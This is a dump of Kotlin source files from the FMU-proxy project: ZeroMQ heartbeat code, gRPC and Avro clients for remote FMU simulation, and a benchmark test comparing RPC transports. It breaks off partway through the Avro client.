"f6a2aaa05b9981ed88f6c475cb863d12a1137ad0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 6308, "license_type": "permissive", "max_line_length": 129, "num_lines": 187, "path": "/java/FMU-proxy/fmu-proxy/src/main/kotlin/no/mechatronics/sfi/fmuproxy/heartbeat/Heartbeat.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017. Norwegian University of Technology\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy.heartbeat\n\nimport com.google.gson.Gson\nimport com.google.gson.GsonBuilder\nimport no.mechatronics.sfi.fmuproxy.fmu.RemoteFmu\nimport no.mechatronics.sfi.fmuproxy.net.SimpleSocketAddress\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\nimport org.zeromq.ZContext\nimport org.zeromq.ZFrame\nimport org.zeromq.ZMQ\nimport org.zeromq.ZMsg\nimport java.io.Closeable\n\nprivate const val HEARTBEAT_LIVENESS = 3L // 3-5 is reasonable\nprivate const val HEARTBEAT_INTERVAL = 1000L // msecs\nprivate const val INTERVAL_INIT = 1000L // Initial reconnect\nprivate const val INTERVAL_MAX = 32000L // After exponential backoff\n\nprivate const val PPP_READY = \"\\u0001\"// Signals worker is ready\nprivate const val PPP_HEARTBEAT = \"\\u0002\"// Signals worker heartbeat\n\n/**\n *\n * @author Lars Ivar Hatledal\n */\ninternal class Heartbeat(\n private val remoteAddress: SimpleSocketAddress,\n private val remoteFmu: RemoteFmu\n): Closeable {\n\n private var inner: InnerClass? = null\n\n private val isRunning: Boolean\n get() = inner != null\n\n fun start() {\n if (!isRunning) {\n inner = InnerClass()\n LOG.debug(\"${javaClass.simpleName} started!\")\n }\n }\n\n fun stop() {\n if (isRunning) {\n inner!!.stop()\n LOG.debug(\"${javaClass.simpleName} stopped!\")\n }\n }\n\n override fun close() {\n stop()\n }\n\n companion object {\n private val LOG: Logger = LoggerFactory.getLogger(Heartbeat::class.java)\n }\n\n private inner class InnerClass : Runnable {\n\n private val thread: Thread\n private var stop = false\n private val ctx: ZContext = ZContext(1)\n private val gson: Gson = GsonBuilder().create()\n\n init {\n thread = Thread(this)\n thread.start()\n }\n\n fun stop() {\n stop = true\n ctx.close()\n thread.join()\n }\n\n private fun workerSocket(ctx: ZContext): ZMQ.Socket {\n return ctx.createSocket(ZMQ.DEALER).also { worker ->\n worker.identity = remoteFmu.guid.toByteArray(ZMQ.CHARSET)\n worker.connect(\"tcp://${remoteAddress.host}:${remoteAddress.port}\")\n\n ZMsg().apply {\n add(PPP_READY)\n add(gson.toJson(remoteFmu).toByteArray(ZMQ.CHARSET))\n send(worker)\n }\n\n }\n\n }\n\n override fun run() {\n\n try {\n\n var worker = workerSocket(ctx)\n val poller = ctx.createPoller(1).apply {\n register(worker, ZMQ.Poller.POLLIN)\n }\n\n // If liveness hits zero, queue is considered disconnected\n var liveness = HEARTBEAT_LIVENESS\n var interval = INTERVAL_INIT\n\n // Send out heartbeats at regular intervals\n var heartbeatAt = System.currentTimeMillis() + HEARTBEAT_INTERVAL\n\n while (!stop) {\n\n if (poller.poll(HEARTBEAT_INTERVAL) == -1) break // Interrupted\n\n if (poller.pollin(0)) {\n val msg = ZMsg.recvMsg(worker) ?: break // Interrupted\n when (msg.size) {\n 1 -> {\n val frame = msg.first\n if (PPP_HEARTBEAT == String(frame.data)) {\n liveness = HEARTBEAT_LIVENESS\n } else {\n LOG.warn(\"E: invalid message\\n\")\n msg.dump(System.out)\n }\n msg.destroy()\n }\n else -> {\n LOG.warn(\"E: invalid message\\n\")\n msg.dump(System.out)\n }\n }\n interval = INTERVAL_INIT\n } else if (--liveness == 0L) {\n\n LOG.debug(\"FmuHeartbeat failure, can't reach remote @ $remoteAddress, \\n reconnecting in $interval msec\")\n\n Thread.sleep(interval)\n if (interval < INTERVAL_MAX) {\n interval *= 2\n }\n\n poller.unregister(worker)\n ctx.destroySocket(worker)\n worker = workerSocket(ctx)\n poller.register(worker, ZMQ.Poller.POLLIN)\n liveness = HEARTBEAT_LIVENESS\n }\n\n if (System.currentTimeMillis() > heartbeatAt) {\n heartbeatAt = System.currentTimeMillis() + HEARTBEAT_INTERVAL\n ZFrame(PPP_HEARTBEAT).apply {\n send(worker, 0 )\n }\n }\n\n }\n\n } catch (ex: Exception) {\n LOG.debug(\"Caught exception\", ex)\n }\n\n }\n }\n\n}\n\n\n" }, { "alpha_fraction": 0.49210846424102783, "alphanum_fraction": 0.49669498205184937, "avg_line_length": 29.2612247467041, "blob_id": "5753c5c7be593eb28b974c35ab8a7ef983c0d40b", "content_id": "9fac0ecb74194a256a099ae6033edc9d230ab6cc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 7413, "license_type": "permissive", "max_line_length": 107, "num_lines": 245, "path": "/java/FMU-proxy/web/src/main/kotlin/no/mechatronics/sfi/fmuproxy/web/fmu/FmuService.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology (NTNU)\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy.web.fmu\n\nimport com.google.gson.GsonBuilder\nimport no.mechatronics.sfi.fmuproxy.web.ServletContextListenerImpl\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\nimport org.zeromq.ZContext\nimport org.zeromq.ZFrame\nimport org.zeromq.ZMQ\nimport org.zeromq.ZMsg\nimport java.io.Serializable\nimport java.util.*\nimport javax.annotation.PostConstruct\nimport javax.faces.bean.ApplicationScoped\nimport javax.faces.bean.ManagedBean\nimport kotlin.collections.HashSet\n\nprivate const val HEARTBEAT_LIVENESS = 3L // 3-5 is reasonable\nprivate const val HEARTBEAT_INTERVAL = 1000L // msecs\n\nprivate const val PPP_READY = \"\\u0001\" // Signals worker is ready\nprivate const val PPP_HEARTBEAT = \"\\u0002\" // Signals worker heartbeat\n\nprivate const val PORT = 7000\n\n\n/**\n * @author Lars Ivar Hatledal\n */\n@ManagedBean(eager = true)\n@ApplicationScoped\nclass FmuService: Serializable {\n\n val fmus: MutableSet<RemoteFmu> = Collections.synchronizedSet(HashSet())\n\n @Transient\n private var beat: Heartbeat? = null\n\n init {\n INSTANCE = this\n }\n\n @PostConstruct\n fun init() {\n if (beat == null) {\n beat = Heartbeat(PORT).apply {\n start()\n LOG.info(\"FmuService heartbeat started\")\n }\n\n ServletContextListenerImpl.onDestroy {\n beat?.stopBlocking()\n LOG.info(\"FmuService heartbeat stopped\")\n }\n }\n\n }\n\n fun add(fmu: RemoteFmu): Boolean {\n synchronized(fmus) {\n return fmus.add(fmu)\n }\n }\n\n fun remove(guid: String): Boolean {\n synchronized(fmus) {\n for (fmu in fmus) {\n if (fmu.guid == guid) {\n return fmus.remove(fmu)\n }\n }\n }\n return false\n }\n\n\n companion object {\n\n private val LOG: Logger = LoggerFactory.getLogger(FmuService::class.java)\n\n internal lateinit var INSTANCE: FmuService\n\n }\n\n\n private inner class Heartbeat(\n private val port: Int\n ) {\n\n private var stop: Boolean = false\n private var thread: Thread? = null\n private val gson = GsonBuilder().create()\n private val workers: MutableMap<String, Worker> = HashMap()\n\n fun start() {\n\n if (thread == null) {\n\n thread = Thread{\n\n ZContext().use { ctx ->\n\n val backend = ctx.createSocket(ZMQ.ROUTER).apply {\n rcvHWM = 1\n bind(\"tcp://*:$port\")\n }\n val poller = ctx.createPoller(1).apply {\n register(ZMQ.PollItem(backend, ZMQ.Poller.POLLIN))\n }\n\n var heartbeatAt = System.currentTimeMillis() + HEARTBEAT_INTERVAL\n\n while (!stop) {\n\n if (poller.poll(HEARTBEAT_INTERVAL) == -1) {\n break\n }\n\n if (poller.pollin(0)) {\n\n val msg = ZMsg.recvMsg(backend) ?: break // Interrupted\n\n val address: ZFrame = msg.unwrap()\n val uuid = String(address.data, ZMQ.CHARSET)\n\n if (String(msg.first.data, ZMQ.CHARSET) == PPP_READY) {\n\n val data = String(msg.last.data, ZMQ.CHARSET)\n val remoteFmu = gson.fromJson(data, RemoteFmu::class.java).apply {\n init()\n }\n\n if (add(remoteFmu)) {\n LOG.info(\"FMU $remoteFmu connected!\")\n workers[uuid] = Worker(address)\n }\n\n }\n\n if (uuid in workers) {\n workers[uuid]!!.updateExpiry()\n }\n\n msg.destroy()\n\n }\n\n if (System.currentTimeMillis() >= heartbeatAt) {\n for (worker in workers.values) {\n\n worker.address.send(backend,\n ZFrame.REUSE + ZFrame.MORE)\n val frame = ZFrame(PPP_HEARTBEAT)\n frame.send(backend, 0)\n\n }\n heartbeatAt = System.currentTimeMillis() + HEARTBEAT_INTERVAL\n }\n\n purge(workers)\n\n }\n\n workers.clear()\n\n }\n\n }.apply { start() }\n }\n\n }\n\n fun stop() {\n thread?.apply {\n stop = true\n }\n }\n\n fun stopBlocking() {\n thread?.apply {\n stop = true\n join()\n }\n }\n\n private fun purge(workers: MutableMap<String, Worker>) {\n val it = workers.entries.iterator()\n while (it.hasNext()) {\n val next = it.next()\n val worker = next.value\n\n if (System.currentTimeMillis() > worker.expiry) {\n val guid: String = next.key\n if (remove(guid)) {\n LOG.info(\"{}, disconnected!\", guid)\n }\n it.remove()\n }\n }\n }\n\n inner class Worker(\n internal val address: ZFrame // Address of worker\n ) {\n var expiry: Long // Expires at this time\n\n init {\n expiry = nextExpiry()\n }\n\n private fun nextExpiry() = System.currentTimeMillis() + HEARTBEAT_INTERVAL * HEARTBEAT_LIVENESS\n\n fun updateExpiry() {\n expiry = nextExpiry()\n }\n\n }\n\n }\n\n}" }, { "alpha_fraction": 0.621351420879364, "alphanum_fraction": 0.6227304339408875, "avg_line_length": 34.08871078491211, "blob_id": "79312730f8fb5beb12d0e790e4412a315ffaa670", "content_id": "2f0c7031da7ef01125e86cfc2adcbc41b60b0ecc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 8702, "license_type": "permissive", "max_line_length": 109, "num_lines": 248, "path": "/java/FMU-proxy/fmu-proxy-clients/src/main/kotlin/no/mechatronics/sfi/fmuproxy/grpc/GrpcFmuClient.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology (NTNU)\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy.grpc\n\n\nimport com.google.protobuf.Empty\nimport io.grpc.ManagedChannel\nimport io.grpc.ManagedChannelBuilder\nimport no.mechatronics.sfi.fmi4j.common.*\nimport no.mechatronics.sfi.fmi4j.modeldescription.CommonModelDescription\nimport no.mechatronics.sfi.fmuproxy.RpcFmuClient\nimport no.mechatronics.sfi.fmuproxy.Solver\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\n\nprivate val EMPTY = Empty.getDefaultInstance()\n\n\n/**\n * @author Lars Ivar Hatledal\n */\nclass GrpcFmuClient(\n host: String,\n port: Int\n): RpcFmuClient() {\n\n private val channel: ManagedChannel = ManagedChannelBuilder\n .forAddress(host, port)\n .usePlaintext()\n .directExecutor()\n .build()\n\n private val blockingStub: FmuServiceGrpc.FmuServiceBlockingStub = FmuServiceGrpc.newBlockingStub(channel)\n\n override val modelDescription: CommonModelDescription by lazy {\n blockingStub.getModelDescription(EMPTY).convert()\n }\n\n override val modelDescriptionXml: String by lazy {\n blockingStub.getModelDescriptionXml(EMPTY).value\n }\n \n override fun getCurrentTime(fmuId: Int): Double {\n return blockingStub.getCurrentTime(fmuId.asProtoUInt()).value\n }\n\n override fun isTerminated(fmuId: Int): Boolean {\n return blockingStub.isTerminated(fmuId.asProtoUInt()).value\n }\n\n override fun init(fmuId: Int, start: Double, stop: Double): FmiStatus {\n return Proto.InitRequest.newBuilder()\n .setFmuId(fmuId)\n .setStart(start)\n .setStop(stop)\n .build().let {\n blockingStub.init(it).convert()\n }\n }\n\n override fun step(fmuId: Int, stepSize: Double): Pair<Double, FmiStatus> {\n return Proto.StepRequest.newBuilder()\n .setFmuId(fmuId)\n .setStepSize(stepSize)\n .build().let {\n blockingStub.step(it).let { \n it.simulationTime to it.status.convert()\n }\n }\n }\n\n override fun reset(fmuId: Int): FmiStatus {\n return blockingStub.reset(fmuId.asProtoUInt()).convert()\n }\n\n override fun terminate(fmuId: Int): FmiStatus {\n return blockingStub.terminate(fmuId.asProtoUInt()).convert()\n }\n\n override fun readInteger(fmuId: Int, vr: Int): FmuIntegerRead {\n return blockingStub.readInteger(getReadRequest(fmuId, vr)).convert()\n }\n\n override fun bulkReadInteger(fmuId: Int, vr: List<Int>): FmuIntegerArrayRead {\n return blockingStub.bulkReadInteger(getReadRequest(fmuId, vr)).convert()\n }\n\n override fun readReal(fmuId: Int, vr: Int): FmuRealRead {\n return blockingStub.readReal(getReadRequest(fmuId, vr)).convert()\n }\n\n override fun bulkReadReal(fmuId: Int, vr: List<Int>): FmuRealArrayRead {\n return blockingStub.bulkReadReal(getReadRequest(fmuId, vr)).convert()\n }\n\n override fun readString(fmuId: Int, vr: Int): FmuStringRead {\n return blockingStub.readString(getReadRequest(fmuId, vr)).convert()\n }\n\n override fun bulkReadString(fmuId: Int, vr: List<Int>): FmuStringArrayRead {\n return blockingStub.bulkReadString(getReadRequest(fmuId, vr)).convert()\n }\n\n override fun readBoolean(fmuId: Int, vr: Int): FmuBooleanRead {\n return blockingStub.readBoolean(getReadRequest(fmuId, vr)).convert()\n }\n\n override fun bulkReadBoolean(fmuId: Int, vr: List<Int>): FmuBooleanArrayRead {\n return blockingStub.bulkReadBoolean(getReadRequest(fmuId, vr)).convert()\n }\n\n override fun writeInteger(fmuId: Int, vr: ValueReference, value: Int): FmiStatus {\n return Proto.WriteIntRequest.newBuilder()\n .setFmuId(fmuId)\n .setValueReference(vr)\n .setValue(value)\n .build().let {\n blockingStub.writeInteger(it).convert()\n }\n }\n\n override fun bulkWriteInteger(fmuId: Int, vr: List<Int>, value: List<Int>): FmiStatus {\n return Proto.BulkWriteIntRequest.newBuilder()\n .setFmuId(fmuId)\n .addAllValueReferences(vr)\n .addAllValues(value)\n .build().let {\n blockingStub.bulkWriteInteger(it).convert()\n }\n }\n\n override fun writeReal(fmuId: Int, vr: ValueReference, value: Real): FmiStatus {\n return Proto.WriteRealRequest.newBuilder()\n .setFmuId(fmuId)\n .setValueReference(vr)\n .setValue(value)\n .build().let {\n blockingStub.writeReal(it).convert()\n }\n }\n\n override fun bulkWriteReal(fmuId: Int, vr: List<Int>, value: List<Real>): FmiStatus {\n return Proto.BulkWriteRealRequest.newBuilder()\n .setFmuId(fmuId)\n .addAllValueReferences(vr)\n .addAllValues(value)\n .build().let {\n blockingStub.bulkWriteReal(it).convert()\n }\n }\n\n override fun writeString(fmuId: Int, vr: ValueReference, value: String): FmiStatus {\n return Proto.WriteStrRequest.newBuilder()\n .setFmuId(fmuId)\n .setValueReference(vr)\n .setValue(value)\n .build().let {\n blockingStub.writeString(it).convert()\n }\n }\n\n override fun bulkWriteString(fmuId: Int, vr: List<Int>, value: List<String>): FmiStatus {\n return Proto.BulkWriteStrRequest.newBuilder()\n .setFmuId(fmuId)\n .addAllValueReferences(vr)\n .addAllValues(value)\n .build().let {\n blockingStub.bulkWriteString(it).convert()\n }\n }\n\n override fun writeBoolean(fmuId: Int, vr: ValueReference, value: Boolean): FmiStatus {\n return Proto.WriteBoolRequest.newBuilder()\n .setFmuId(fmuId)\n .setValueReference(vr)\n .setValue(value)\n .build().let {\n blockingStub.writeBoolean(it).convert()\n }\n }\n\n override fun bulkWriteBoolean(fmuId: Int, vr: List<Int>, value: List<Boolean>): FmiStatus {\n return Proto.BulkWriteBoolRequest.newBuilder()\n .setFmuId(fmuId)\n .addAllValueReferences(vr)\n .addAllValues(value)\n .build().let {\n blockingStub.bulkWriteBoolean(it).convert()\n }\n }\n\n override fun createInstanceFromCS(): Int {\n return blockingStub.createInstanceFromCS(EMPTY).value\n }\n\n override fun createInstanceFromME(solver: Solver): Int {\n return blockingStub.createInstanceFromME(solver.protoType()).value\n }\n\n override fun close() {\n super.close()\n channel.shutdownNow()\n }\n\n\n private companion object {\n\n val LOG: Logger = LoggerFactory.getLogger(GrpcFmuClient::class.java)\n\n private fun getReadRequest(fmuId: Int, vr: Int): Proto.ReadRequest {\n return Proto.ReadRequest.newBuilder()\n .setFmuId(fmuId)\n .setValueReference(vr)\n .build()\n }\n\n private fun getReadRequest(fmuId: Int, vr: List<Int>): Proto.BulkReadRequest {\n return Proto.BulkReadRequest.newBuilder()\n .setFmuId(fmuId)\n .addAllValueReferences(vr)\n .build()\n }\n\n }\n\n}\n" }, { "alpha_fraction": 0.606921911239624, "alphanum_fraction": 0.615042507648468, "avg_line_length": 28.392045974731445, "blob_id": "46ba49ba114547d15634e5576d51ea83fc8e5a86", "content_id": "0e154a062bfc56938d6064ca75e0bd17216dc53f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 5172, "license_type": "permissive", "max_line_length": 125, "num_lines": 176, "path": "/java/FMU-proxy/fmu-proxy/src/test/kotlin/no/mechatronics/sfi/fmuproxy/Benchmark.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "package no.mechatronics.sfi.fmuproxy\n\nimport info.laht.yajrpc.RpcHandler\nimport info.laht.yajrpc.net.http.RpcHttpClient\nimport info.laht.yajrpc.net.tcp.RpcTcpClient\nimport info.laht.yajrpc.net.ws.RpcWebSocketClient\nimport info.laht.yajrpc.net.zmq.RpcZmqClient\nimport no.mechatronics.sfi.fmi4j.common.FmiSimulation\nimport no.mechatronics.sfi.fmi4j.common.FmiStatus\nimport no.mechatronics.sfi.fmi4j.fmu.Fmu\nimport no.mechatronics.sfi.fmuproxy.avro.AvroFmuClient\nimport no.mechatronics.sfi.fmuproxy.avro.AvroFmuServer\nimport no.mechatronics.sfi.fmuproxy.grpc.GrpcFmuClient\nimport no.mechatronics.sfi.fmuproxy.grpc.GrpcFmuServer\nimport no.mechatronics.sfi.fmuproxy.jsonrpc.*\nimport no.mechatronics.sfi.fmuproxy.jsonrpc.service.RpcFmuService\nimport no.mechatronics.sfi.fmuproxy.thrift.ThriftFmuClient\nimport no.mechatronics.sfi.fmuproxy.thrift.ThriftFmuServer\nimport org.junit.jupiter.api.AfterAll\nimport org.junit.jupiter.api.Assertions\nimport org.junit.jupiter.api.Test\nimport org.junit.jupiter.api.TestInstance\nimport org.junit.jupiter.api.condition.EnabledIfEnvironmentVariable\nimport org.junit.jupiter.api.condition.EnabledOnOs\nimport org.junit.jupiter.api.condition.OS\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\nimport java.io.File\n\n\n@TestInstance(TestInstance.Lifecycle.PER_CLASS)\n@EnabledIfEnvironmentVariable(named = \"TEST_FMUs\", matches = \".*\")\nclass Benchmark {\n\n companion object {\n\n private val LOG: Logger = LoggerFactory.getLogger(Benchmark::class.java)\n\n private const val dt = 1E-4\n private const val stop = 20.0\n\n private val fmuPath = File(TestUtils.getTEST_FMUs(),\n \"FMI_2.0/CoSimulation/${TestUtils.getOs()}/20sim/4.6.4.8004/ControlledTemperature/ControlledTemperature.fmu\")\n\n }\n\n private val fmu = Fmu.from(fmuPath)\n\n @AfterAll\n fun tearDown() {\n fmu.close()\n }\n\n @Test\n fun measureTimeLocal() {\n\n fmu.asCoSimulationFmu().newInstance().use { instance ->\n runInstance(instance, dt, stop, {\n val read = instance.variableAccessor.readReal(\"Temperature_Room\")\n Assertions.assertTrue(read.value > 0)\n }).also {\n LOG.info(\"Local duration=${it}ms\")\n }\n }\n\n }\n\n\n @Test\n fun measureTimeThrift() {\n\n val server = ThriftFmuServer(fmu)\n val port = server.start()\n\n val client = ThriftFmuClient(\"localhost\", port)\n client.newInstance().use { instance ->\n runInstance(instance, dt, stop, {\n val read = instance.readReal(\"Temperature_Room\")\n Assertions.assertTrue(read.value > 0)\n }).also {\n LOG.info(\"Thrift duration=${it}ms\")\n }\n }\n\n client.close()\n server.close()\n\n }\n\n @Test\n fun measureTimeAvro() {\n\n val server = AvroFmuServer(fmu)\n val port = server.start()\n\n val client = AvroFmuClient(\"localhost\", port)\n client.newInstance().use { instance ->\n runInstance(instance, dt, stop, {\n val read = instance.readReal(\"Temperature_Room\")\n Assertions.assertTrue(read.value > 0)\n }).also {\n LOG.info(\"Avro duration=${it}ms\")\n }\n }\n\n client.close()\n server.close()\n\n }\n\n @Test\n fun measureTimeGrpc() {\n\n val server = GrpcFmuServer(fmu)\n val port = server.start()\n\n val client = GrpcFmuClient(\"localhost\", port)\n client.newInstance().use { instance ->\n runInstance(instance, dt, stop, {\n val read = instance.readReal(\"Temperature_Room\")\n Assertions.assertTrue(read.value > 0)\n }).also {\n LOG.info(\"gRPC duration=${it}ms\")\n }\n }\n\n client.close()\n server.close()\n\n }\n\n @Test\n fun measureTimeJson() {\n\n val wsPort = 8001\n val tcpPort = 8002\n val zmqPort = 8003\n val httpPort = 8004\n\n val handler = RpcHandler(RpcFmuService(fmu))\n\n val servers = listOf(\n FmuProxyJsonHttpServer(handler).apply { start(httpPort) },\n FmuProxyJsonWsServer(handler).apply { start(wsPort) },\n FmuProxyJsonTcpServer(handler).apply { start(tcpPort) },\n FmuProxyJsonZmqServer(handler).apply { start(zmqPort) }\n )\n\n val host = \"localhost\"\n val clients = listOf(\n RpcHttpClient(host, httpPort),\n RpcWebSocketClient(host, wsPort),\n RpcTcpClient(host, tcpPort),\n RpcZmqClient(host, zmqPort)\n ).map { JsonRpcFmuClient(it) }\n\n clients.forEach { client ->\n\n client.newInstance().use { instance ->\n runInstance(instance, dt, stop, {\n val read = instance.readReal(\"Temperature_Room\")\n Assertions.assertTrue(read.value > 0)\n }).also {\n LOG.info(\"${client.client.javaClass.simpleName} duration=${it}ms\")\n }\n }\n\n client.close()\n\n }\n\n servers.forEach { it.close() }\n\n }\n\n}" }, { "alpha_fraction": 0.7011661529541016, "alphanum_fraction": 0.70298832654953, "avg_line_length": 34.41290283203125, "blob_id": "5d6ed5de4e0c2fbe9f582d1df1c4514d0b11be42", "content_id": "2b556c71bd23af37394a98207f576f6c084c3da8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 5488, "license_type": "permissive", "max_line_length": 95, "num_lines": 155, "path": "/java/FMU-proxy/fmu-proxy-clients/src/main/kotlin/no/mechatronics/sfi/fmuproxy/avro/AvroFmuClient.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology (NTNU)\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy.avro\n\nimport no.mechatronics.sfi.fmi4j.common.*\nimport no.mechatronics.sfi.fmi4j.modeldescription.CommonModelDescription\nimport no.mechatronics.sfi.fmuproxy.RpcFmuClient\nimport no.mechatronics.sfi.fmuproxy.Solver\nimport org.apache.avro.ipc.NettyTransceiver\nimport org.apache.avro.ipc.specific.SpecificRequestor\nimport java.net.InetSocketAddress\n\n\nclass AvroFmuClient(\n host: String,\n port: Int\n): RpcFmuClient() {\n\n private val client = NettyTransceiver(InetSocketAddress(host, port))\n private val service = SpecificRequestor.getClient(AvroFmuService::class.java, client)\n\n override val modelDescription: CommonModelDescription by lazy {\n service.modelDescription.convert()\n }\n\n override val modelDescriptionXml: String by lazy {\n service.modelDescriptionXml\n }\n\n override fun getCurrentTime(fmuId: Int): Double {\n return service.getCurrentTime(fmuId)\n }\n\n override fun isTerminated(fmuId: Int): Boolean {\n return service.isTerminated(fmuId)\n }\n\n override fun init(fmuId: Int, start: Double, stop: Double): FmiStatus {\n return service.init(fmuId, start, stop).convert()\n }\n\n override fun terminate(fmuId: Int): FmiStatus {\n return service.terminate(fmuId).convert()\n }\n\n override fun step(fmuId: Int, stepSize: Double): Pair<Double, FmiStatus> {\n return service.step(fmuId, stepSize).let {\n it.simulationTime to it.status.convert()\n }\n }\n\n override fun reset(fmuId: Int): FmiStatus {\n return service.reset(fmuId).convert()\n }\n\n override fun readInteger(fmuId: Int, vr: Int): FmuIntegerRead {\n return service.readInteger(fmuId, vr).convert()\n }\n\n override fun bulkReadInteger(fmuId: Int, vr: List<Int>): FmuIntegerArrayRead {\n return service.bulkReadInteger(fmuId, vr).convert()\n }\n\n override fun readReal(fmuId: Int, vr: Int): FmuRealRead {\n return service.readReal(fmuId, vr).convert()\n }\n\n override fun bulkReadReal(fmuId: Int, vr: List<Int>): FmuRealArrayRead {\n return service.bulkReadReal(fmuId, vr).convert()\n }\n\n override fun readString(fmuId: Int, vr: Int): FmuStringRead {\n return service.readString(fmuId, vr).convert()\n }\n\n override fun bulkReadString(fmuId: Int, vr: List<Int>): FmuStringArrayRead {\n return service.bulkReadString(fmuId, vr).convert()\n }\n\n override fun readBoolean(fmuId: Int, vr: Int): FmuBooleanRead {\n return service.readBoolean(fmuId, vr).convert()\n }\n\n override fun bulkReadBoolean(fmuId: Int, vr: List<Int>): FmuBooleanArrayRead {\n return service.bulkReadBoolean(fmuId, vr).convert()\n }\n\n override fun writeInteger(fmuId: Int, vr: ValueReference, value: Int): FmiStatus {\n return service.writeInteger(fmuId, vr, value).convert()\n }\n\n override fun bulkWriteInteger(fmuId: Int, vr: List<Int>, value: List<Int>): FmiStatus {\n return service.bulkWriteInteger(fmuId, vr, value).convert()\n }\n\n override fun writeReal(fmuId: Int, vr: ValueReference, value: Real): FmiStatus {\n return service.writeReal(fmuId, vr, value).convert()\n 